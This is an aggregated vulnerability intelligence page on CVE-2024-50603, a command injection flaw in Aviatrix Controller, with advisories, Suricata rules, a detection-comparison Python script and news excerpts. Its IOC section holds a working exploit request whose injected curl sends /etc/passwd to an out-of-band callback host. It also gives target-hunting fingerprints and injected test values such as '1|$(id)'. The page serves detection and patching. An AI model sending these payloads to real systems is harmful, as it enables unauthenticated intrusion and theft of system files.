CVE-2024-50603
Published 2025-01-08
Priority P1 (99) · critical 9.8 · CVSS 3.1
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: KEV · ITW · EXPLOIT · Initial access
CISA Known Exploited Vulnerability, remediation due 2025-02-06
Exploited in the wild
EPSS: 98.55% (99.9th percentile)
An issue was discovered in Aviatrix Controller before 7.1.4191 and 7.2.x before 7.2.4996. Due to the improper neutralization of special elements used in an OS command, an unauthenticated attacker is able to execute arbitrary code. Shell metacharacters can be sent to /v1/api in cloud_type for list_flightpath_destination_instances, or src_cloud_type for flightpath_connection_test.
Affected (3 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| aviatrix | controller | < 7.1.4191 | 7.1.4191 |
| aviatrix | controller | >= 7.2 < 7.2.4996 | 7.2.4996 |
| aviatrix | controller | >= 7.2.0 < 7.2.4996 | 7.2.4996 |
Detection & IOCs (extracted from sources)
Command: action=list_flightpath_destination_instances&CID=anything_goes_here&account_name=1&region=1&vpc_id_name=1&cloud_type=1|$(curl+-X+POST+-d+@/etc/passwd+{{oast}})
- Exploit targets POST /v1/api with action=list_flightpath_destination_instances or flightpath_connection_test; inject shell metacharacters in cloud_type or src_cloud_type parameters to achieve unauthenticated RCE
- Hunt for Aviatrix Controller instances via Shodan/FOFA/ZoomEye using title-based fingerprints: http.title:"aviatrix controller", http.title:"aviatrix cloud controller", app="aviatrix-controller", title="aviatrix cloud controller"
- Detect exploitation via OAST/interactsh callback: look for HTTP POST to /v1/api returning HTTP 200 combined with out-of-band DNS/HTTP interaction containing root:.*:0:0: in the request body (exfiltrated /etc/passwd)
- All observed malware was first deployed between 2025-01-07 and 2025-01-10; exploitation surged following publication of a Nuclei template — use this timeline to scope forensic investigation on Aviatrix Controller instances
- The IP address 172.104.60[.]176 is associated with at least one Sliver-deploying actor but is likely a shared proxy server and therefore not strictly reliable as a standalone IOC
- The patch must be re-applied if the Controller is later upgraded to a version prior to 7.1.4191 or 7.2.4996, or if the Controller does not have an associated CoPilot running version 4.16.1 or higher
CVSS provenance
- NVD: v3.1 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- VulnCheck: 10.0 CRITICAL
- CISA: 9.8 CRITICAL
GHSA
GHSA-2vqc-674h-xh9w · ghsa_unreviewed · 2025-01-08 · CVE-2024-50603 [CRITICAL] CWE-78
An issue was discovered in Aviatrix Controller before 7.1.4191 and 7.2.x before 7.2.4996. Due to the improper neutralization of special elements used in an OS command, an unauthenticated attacker is able to execute arbitrary code. Shell metacharacters can be sent to /v1/api in cloud_type for list_flightpath_destination_instances, or src_cloud_type for flightpath_connection_test.
VulnCheck
Aviatrix Controllers OS Command Injection Vulnerability · vulncheck · 2024 · CVSS 10.0 · CVE-2024-50603 [CRITICAL] CWE-78
Aviatrix Controllers contain an OS command injection vulnerability that could allow an unauthenticated attacker to execute arbitrary code. Shell metacharacters can be sent to /v1/api in cloud_type for list_flightpath_destination_instances, or src_cloud_type for flightpath_connection_test.
Affected: Aviatrix Controllers
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://docs.aviatrix.com/documentation/latest/release-notices/psirt-advisories/psirt-advisories.html?expand=true#remote-code-execution-vulnerability-in-aviatrix-controllers; https://www.wiz.io/blog/wiz-research-identifies-exploitation-in-the-wild-of-aviatrix-cve-2024-
CISA
Aviatrix Controllers OS Command Injection Vulnerability · cisa · 2025-01-16 · CVSS 9.8 · CVE-2024-50603 [CRITICAL] CWE-78
Affected: Aviatrix Controllers
Aviatrix Controllers contain an OS command injection vulnerability that could allow an unauthenticated attacker to execute arbitrary code. Shell metacharacters can be sent to /v1/api in cloud_type for list_flightpath_destination_instances, or src_cloud_type for flightpath_connection_test.
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Notes: https://docs.aviatrix.com/documentation/latest/release-notices/psirt-advisories/psirt-advisories.html?expand=true ; https://nvd.nist.gov/vuln/detail/CVE-2024-50603
Remediation Due Date: 2025-02-06
Suricata
ET WEB_SPECIFIC_APPS Aviatrix Controller Unauthenticated OS Command Injection (CVE-2024-50603) M2 · suricata · 2025-01-13 · CVSS 10.0 · CVE-2024-50603 [CRITICAL]
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Aviatrix Controller Unauthenticated OS Command Injection (CVE-2024-50603) M2"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/v1/api"; http.request_body; content:"action|3d|flightpath_connection_test"; fast_pattern; content:"src_cloud_type|3d|"; pcre:"/^[\S]*?[\x3b\x0a\x26\x60\x7c\x24]/R"; reference:url,securing.pl/en/cve-2024-50603-aviatrix-network-controller-command-injection-vulnerability/; reference:cve,2024-50603; classtype:web-application-attack; sid:2059174; rev:1; metadata:attack_target Server, tls_state TLSDecrypt, created_at 2025_01_13, cve CVE_2024_50603, deployment Perimete
Suricata
ET WEB_SPECIFIC_APPS Aviatrix Controller Unauthenticated OS Command Injection (CVE-2024-50603) M1 · suricata · 2025-01-13 · CVSS 10.0 · CVE-2024-50603 [CRITICAL]
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Aviatrix Controller Unauthenticated OS Command Injection (CVE-2024-50603) M1"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/v1/api"; http.request_body; content:"action|3d|list_flightpath_destination_instances"; fast_pattern; content:"cloud_type|3d|"; pcre:"/^[\S]*?[\x3b\x0a\x26\x60\x7c\x24]/R"; reference:url,securing.pl/en/cve-2024-50603-aviatrix-network-controller-command-injection-vulnerability/; reference:cve,2024-50603; classtype:web-application-attack; sid:2059173; rev:1; metadata:attack_target Server, tls_state TLSDecrypt, created_at 2025_01_13, cve CVE_2024_50603, deployment P
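Both ET rules (M1 and M2) share the same shape: `POST` to `/v1/api`, the `action=` value, then `pcre:"/^[\S]*?[\x3b\x0a\x26\x60\x7c\x24]/R"` applied right after `cloud_type=` or `src_cloud_type=` in the body as sent. The character class is `; \n & ` | $`, and it includes `&` (0x26), which is also the form-field separator, so a request whose watched parameter is followed by another field matches the raw pattern even with a harmless value; conversely a value whose metacharacters arrive percent-encoded is not seen by the raw pattern. The Python below is an added example, not code from Emerging Threats or from any source on this page: it approximates the rules' match logic and sets a URL-decoding check beside it so a detection engineer can compare verdicts. The HTTP bodies are constructed test input, not captured traffic.

```python
"""Added example (not from the page's sources or Emerging Threats): emulate the
match logic of the two ET rules for CVE-2024-50603 and compare it with a check
that URL-decodes the body first.  All HTTP bodies below are constructed test
input, not captured traffic."""
import re
from urllib.parse import parse_qs

# action value -> parameter the corresponding rule inspects.
WATCHED = {
    "list_flightpath_destination_instances": "cloud_type",  # sid 2059173 (M1)
    "flightpath_connection_test": "src_cloud_type",         # sid 2059174 (M2)
}

# The rules' pcre byte class \x3b \x0a \x26 \x60 \x7c \x24 is ; \n & ` | $
META = re.compile(r"[;\n&`|$]")
# pcre:"/^[\S]*?[...]/R": from just after "<param>=", any non-space bytes,
# then one metacharacter.  Pattern.match(body, pos) anchors at pos like /R.
RAW_AFTER_PARAM = re.compile(r"\S*?[;\n&`|$]")


def raw_rule_matches(method: str, uri: str, body: str) -> bool:
    """Approximate the Suricata rules on the body as sent: POST to /v1/api,
    action=<name> and <param>= present, then the relative pcre after <param>=."""
    if method != "POST" or "/v1/api" not in uri:
        return False
    for action, param in WATCHED.items():
        if f"action={action}" not in body:
            continue
        needle = f"{param}="
        start = body.find(needle)
        if start == -1:
            continue
        if RAW_AFTER_PARAM.match(body, start + len(needle)):
            return True
    return False


def decoded_value_check(method: str, uri: str, body: str) -> bool:
    """Decode the form body first, then test only the watched parameter's value.
    Field separators no longer count, and percent-encoded metacharacters do."""
    if method != "POST" or "/v1/api" not in uri:
        return False
    fields = parse_qs(body, keep_blank_values=True)
    for action in fields.get("action", []):
        param = WATCHED.get(action)
        if param is None:
            continue
        if any(META.search(value) for value in fields.get(param, [])):
            return True
    return False


# Constructed sample bodies (not real traffic).
SAMPLES = {
    # harmless value, but cloud_type is followed by another field
    "benign_mid": "action=list_flightpath_destination_instances&CID=x&cloud_type=1&vpc_id_name=1",
    # harmless value as the last field
    "benign_last": "action=flightpath_connection_test&CID=x&src_cloud_type=4",
    # metacharacter in the watched field, as in the page's command IOC
    "suspect_raw": "action=list_flightpath_destination_instances&CID=x&cloud_type=1|$(id)",
    # same value with its metacharacters percent-encoded by the client
    "suspect_encoded": "action=list_flightpath_destination_instances&CID=x&cloud_type=1%7c%24%28id%29",
}


def triage(body: str) -> dict:
    """Return both verdicts for one POST /v1/api body."""
    return {
        "raw_rule": raw_rule_matches("POST", "/v1/api", body),
        "decoded": decoded_value_check("POST", "/v1/api", body),
    }


if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(f"{name:16} {triage(body)}")
```

Running it shows `benign_mid` tripping the raw pattern on the `&` separator while the decoded check stays quiet, and `suspect_encoded` being caught only by the decoded check; `suspect_raw` is flagged by both. In a Suricata deployment the equivalent of the second function is a `url_decode` transform (or a tighter class that excludes `&`) ahead of the pcre, at the cost of re-testing the rule against legitimate controller traffic.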
Nuclei
Aviatrix Controller - Remote Code Execution · nuclei · CVSS 9.8 · CVE-2024-50603 [CRITICAL]
An issue was discovered in Aviatrix Controller before 7.1.4191 and 7.2.x before 7.2.4996. Due to the improper neutralization of special elements used in an OS command, an unauthenticated attacker is able to execute arbitrary code. Shell metacharacters can be sent to /v1/api in cloud_type for list_flightpath_destination_instances, or src_cloud_type for flightpath_connection_test.
Template:
```yaml
id: CVE-2024-50603
info:
  name: Aviatrix Controller - Remote Code Execution
  author: newlinesec,securing.pl
  severity: critical
  description: |
    An issue was discovered in Aviatrix Controller before 7.1.4191 and 7.2.x before 7.2.4996. Due to the improper neutralization of special elements used in an OS command, an unauthenticated attacker is able to execute arbit
```
Wiz
Crying Out Cloud Newsletter - February 2025 | Wiz · blogs_wiz · 2025-02-06
Welcome back! In this edition, we bring you the latest in cloud security – noteworthy incidents, exclusive data, and crucial vulnerabilities. Let's dive in.
Here are our top picks of cloud security highlights!
Hype or no hype – Codefinger Ransomware Campaign Targeting S3 Buckets
Codefinger is a ransomware campaign that exploits AWS Server-Side Encryption with Customer Provided Keys (SSE-C) to encrypt data in Amazon S3 buckets. While this campaign has sparked widespread concern, we argue that the panic is unwarranted. Many have focused on detecting unwanted SSE-C encryption as a mitigation strategy, but encryption is merely a tactic chosen by the attacker after gaining access—it is not the core issue. The real concern, which is neither new nor unique, is the use of compromised credential
Bleepingcomputer
Hackers exploit critical Aviatrix Controller RCE flaw in attacks · blogs_bleepingcomputer · 2025-01-13 · CVSS 10.0 · CVE-2024-50603 [CRITICAL]
## Hackers exploit critical Aviatrix Controller RCE flaw in attacks
By Bill Toulas
This allows threat actors to use specially crafted API requests to achieve remote command execution without authentication.
The flaw impacts all versions of Aviatrix Controller from 7.x through 7.2.4820. Users are recommended to upgrade to either 7.1.4191 or 7.2.4996, which addresses the CVE-2024-50603 risk.
## Active exploitation in the wild
Wiz Research reports that a proof-of-concept (PoC) exploit released on GitHub on January 8, 2025, has fueled the exploitation of CVE-2024-50603 in the wild.
Hackers are leveraging the flaw to plant Sliver backdoors and perform unauthorized Monero cryptocurrency mining using XMRig (cryptojacking).
Wiz says that although only a small percentage of cloud enterprise
Wiz
Wiz Research Identifies Exploitation in the Wild of Aviatrix Controller RCE (CVE-2024-50603) | Wiz Blog · blogs_wiz · 2025-01-11 · CVSS 10.0 · CVE-2024-50603 [CRITICAL]
Updated on 2025-01-19 to include additional investigation findings related to Sliver and Mirai infections.
CVE-2024-50603 is a critical code execution vulnerability impacting Aviatrix Controller with the maximum CVSS score of 10.0. This command injection flaw allows unauthenticated attackers to execute arbitrary commands on the system remotely. The vulnerability stems from the improper neutralization of user-supplied input, and has been addressed in patched versions `7.1.4191` and `7.2.4996`.
When deployed in AWS cloud environments, Aviatrix Controller allows privilege escalation by default, making exploitation of this vulnerability a high-impact risk. A simple proof-of-concept exploit has been published, and Wiz Research has already observed exploitation in the wild resulting in cryptojacking and backdoor deployment. For these reasons, it is highly recommended to upgrade Aviatrix Controller to the patched versions, conduct forensic investigation on the devices, and search for lateral movement attempts to the cloud control plane.
Greynoiseio
NoiseLetter January 2025 · blogs_greynoiseio
References
- https://docs.aviatrix.com/documentation/latest/network-security/index.html
- https://docs.aviatrix.com/documentation/latest/release-notices/psirt-advisories/psirt-advisories.html?expand=true#remote-code-execution-vulnerability-in-aviatrix-controllers
- https://www.securing.pl/en/cve-2024-50603-aviatrix-network-controller-command-injection-vulnerability/
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-50603
Timeline
- 2025-01-08: Published
- 2025-01-16: Added to CISA KEV
- Exploited in the wild